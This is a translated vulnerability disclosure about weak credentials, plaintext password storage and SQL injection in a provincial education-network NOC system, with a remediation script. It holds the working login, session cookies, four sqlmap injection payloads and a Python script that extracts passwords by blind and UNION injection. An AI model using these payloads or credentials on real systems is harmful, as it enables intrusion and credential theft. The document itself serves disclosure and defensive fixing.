
Vulnerability summary

Defect ID: wooyun-2015-0162664

Title: Weak password + SQL injection (login required) in a provincial backbone-node NOC system

Vendor: CCERT (China Education and Research Network emergency response team)

Author: 路人甲

Submitted: 2015-12-20 19:59

Fixed: 2016-02-06 10:45

Published: 2016-02-06 10:45

Type: weak back-end password

Severity: high

Self-assessed rank: 15

Status: handed over to the third-party partner organization (CCERT) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-20: Details sent to the vendor; awaiting vendor handling
2015-12-25: Vendor confirmed; details visible to the vendor only
2016-01-04: Details disclosed to core white hats and relevant domain experts
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public

Brief description:

A certain province; please have the third-party partner organization CCERT contact them and handle it.

Detailed description:

Weak password:

http://**.**.**.**/noc/user_login.php
Username: mk
Password: aaaaaa


Passwords stored in plaintext and exposed in the page:
After logging in, viewing other users' details under user management shows their passwords in the page source.

[screenshot: adminsouce-code_20151219123828.png]


SQL injection + plaintext passwords:
The user_id parameter is not properly filtered.

GET /noc/usermodi.php?user_lx=show&user_id=27 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http://**.**.**.**/noc/user.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: qhnu_noc[user]=mk; qhnu_noc[access]=2; hkj=ipbjf97ht6k1ppa42c0e92vb90; JSESSIONID=4C33615E92A6FB59CE0A27B6D0A674C9; userNameForAutomaticSignin=aaaaaaaaa; domainNameForAutomaticSignin=NULL; isADAuth=false; passwordForAutomaticSignin=aaaaaaaaaaa; signInAutomatically=true; flashversionInstalled=19.0.0


Payload (sqlmap output):

Parameter: user_id (GET)

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: user_lx=show&user_id=27 RLIKE (SELECT (CASE WHEN (2900=2900) THEN 27 ELSE 0x28 END))
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: user_lx=show&user_id=27 AND (SELECT 7032 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(SELECT (ELT(7032=7032,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: user_lx=show&user_id=27 AND (SELECT * FROM (SELECT(SLEEP(5)))vJfV)
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: user_lx=show&user_id=-6284 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176786b71,0x6c48457778626256756a516f736c5a5966694a4458776e5a49544b5049486a74634946674e7a6354,0x71706b7071),NULL,NULL-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -
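The sqlmap vectors above only name the inference slot; the following Python script, an added illustration that is not code from the original report or from the NOC system, models the usermodi.php lookup in an in-memory SQLite database and shows what fills that slot: a boolean-blind loop that recovers a stored password one character at a time through the "row present / row absent" oracle, and the UNION vector reduced to this model's single column. The table layout, the sample users and the function names are assumptions; the real back end is MySQL, where ORD() and SUBSTRING() take the place of SQLite's unicode() and substr().

```python
import sqlite3

# Constructed sample data standing in for the NOC user table. The page shows
# only that user_id is numeric and that passwords are stored in plaintext;
# everything else about the schema is an assumption of this model.
SAMPLE_USERS = [
    (1, "admin", "N0c-Admin-2015"),
    (27, "mk", "aaaaaa"),
]


def setup_db():
    """In-memory SQLite stand-in for the MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Models usermodi.php?user_lx=show&user_id=...: the parameter is pasted
    into the SQL text unchanged, which is the defect the report describes.
    Returns the user_name values the query produced (the visible page content)."""
    sql = "SELECT user_name FROM users WHERE user_id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def blind_extract(conn, subquery, max_len=32):
    """Boolean-based blind extraction, i.e. what sqlmap puts in [INFERENCE].
    Each probe appends 'AND <condition>' to a valid id (27) and checks whether
    user 27's row still comes back; a binary search on the character code
    needs at most 7 requests per character. coalesce() turns the NULL that
    unicode('') yields past the end of the string into 0, which ends the loop."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "27 AND coalesce(unicode(substr((%s), %d, 1)), 0) > %d" % (subquery, pos, mid)
            if vulnerable_lookup(conn, probe) == ["mk"]:
                lo = mid + 1  # character code is above mid
            else:
                hi = mid      # character code is mid or below
        if lo == 0:
            break             # past the end of the extracted value
        result += chr(lo)
    return result


def union_dump(conn):
    """The UNION vector from the report with the column count matched to this
    model's single column: an id that matches nothing (-6284) empties the
    original result set, so only the injected SELECT's rows are returned."""
    payload = "-6284 UNION ALL SELECT password FROM users WHERE user_name = 'admin'-- -"
    return vulnerable_lookup(conn, payload)


if __name__ == "__main__":
    db = setup_db()
    print("normal:", vulnerable_lookup(db, "27"))
    print("blind: ", blind_extract(db, "SELECT password FROM users WHERE user_name = 'admin'"))
    print("union: ", union_dump(db))
```

Run the script and the two attack functions return the same admin password, one through roughly a hundred true/false requests, the other in a single request; the error-based and time-based vectors listed above differ only in which side channel carries the same [INFERENCE] bit.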


[screenshot: sql_20151219124618.png]

Proof of vulnerability:

IP address ranges of each school:

[screenshot: ip_20151219114109.png]


Circuit and access-unit contact phone numbers:

[screenshot: 联系电话2015-12-19_120716.png]


IP address usage:

[screenshot: 校内IP地址使用情况2015-12-19_121019.png]


IP address usage management:

[screenshot: 校内IP地址管理2015-12-19_121059.png]


From the above information the network topology of the provincial education network can be mapped out, which lays good groundwork for further penetration. Should this be taken seriously?

Fix:

Change the weak password, and filter the user_id input (bind it as a query parameter instead of concatenating it); stop storing and displaying passwords in plaintext.
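As an added example of what that fix looks like in code (not the NOC system's own code, whose PHP source is not on this page), the Python below hardens the same lookup modelled in an in-memory SQLite database: the id must be all digits and is bound as a parameter, passwords are stored as salted PBKDF2-HMAC-SHA256 so the user management page cannot expose a usable secret, and a minimal policy rejects "aaaaaa". The schema, names and sample users are assumptions.

```python
import hashlib
import hmac
import os
import re
import sqlite3

# Constructed sample data; the second row is the weak credential from the report,
# kept here so the login check can be demonstrated against it.
SAMPLE_USERS = [(1, "admin", "N0c-Admin-2015"), (27, "mk", "aaaaaa")]

PBKDF2_ROUNDS = 200_000
WEAK_PASSWORDS = {"aaaaaa", "123456", "password", "admin"}  # constructed blocklist


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'salt_hex$digest_hex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    """Recomputes the digest with the stored salt; constant-time comparison."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def password_acceptable(password):
    """Minimal policy: length, blocklist, and not a handful of repeated characters."""
    if len(password) < 12 or password.lower() in WEAK_PASSWORDS:
        return False
    return len(set(password)) >= 4


def setup_db():
    """Same table as the vulnerable model, but only hashes reach the password column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(uid, name, hash_password(pw)) for uid, name, pw in SAMPLE_USERS])
    return conn


def safe_lookup(conn, user_id):
    """Hardened user_id handling: reject anything that is not a plain integer
    before it reaches SQL, then bind it as a parameter. Every sqlmap payload
    from the report fails the first check; even a payload that passed it could
    not change the query's structure because it is never part of the SQL text."""
    if not re.fullmatch(r"\d{1,10}", str(user_id)):
        raise ValueError("user_id must be an integer")
    rows = conn.execute("SELECT user_name FROM users WHERE user_id = ?", (int(user_id),))
    return [row[0] for row in rows]


def login(conn, user_name, password):
    """Authenticates against the stored hash; the plaintext is never persisted."""
    row = conn.execute("SELECT password FROM users WHERE user_name = ?", (user_name,)).fetchone()
    return row is not None and verify_password(row[0], password)


if __name__ == "__main__":
    db = setup_db()
    print(safe_lookup(db, "27"))
    for payload in ("27 AND 1=1", "27 RLIKE (SELECT 1)", "-6284 UNION ALL SELECT NULL-- -"):
        try:
            safe_lookup(db, payload)
        except ValueError as exc:
            print("rejected:", payload, "->", exc)
    print("login mk/aaaaaa:", login(db, "mk", "aaaaaa"), "| policy:", password_acceptable("aaaaaa"))
```

With the parameter bound, the boolean, error, time and UNION vectors all collapse into "not an integer" before any SQL runs; the user management page can still list accounts, but the password column now holds only salt and digest, so viewing the page source no longer yields credentials.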

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability rank: 6

Confirmed: 2015-12-25 16:12

Vendor reply:

Notified; handling in progress

Latest status:

None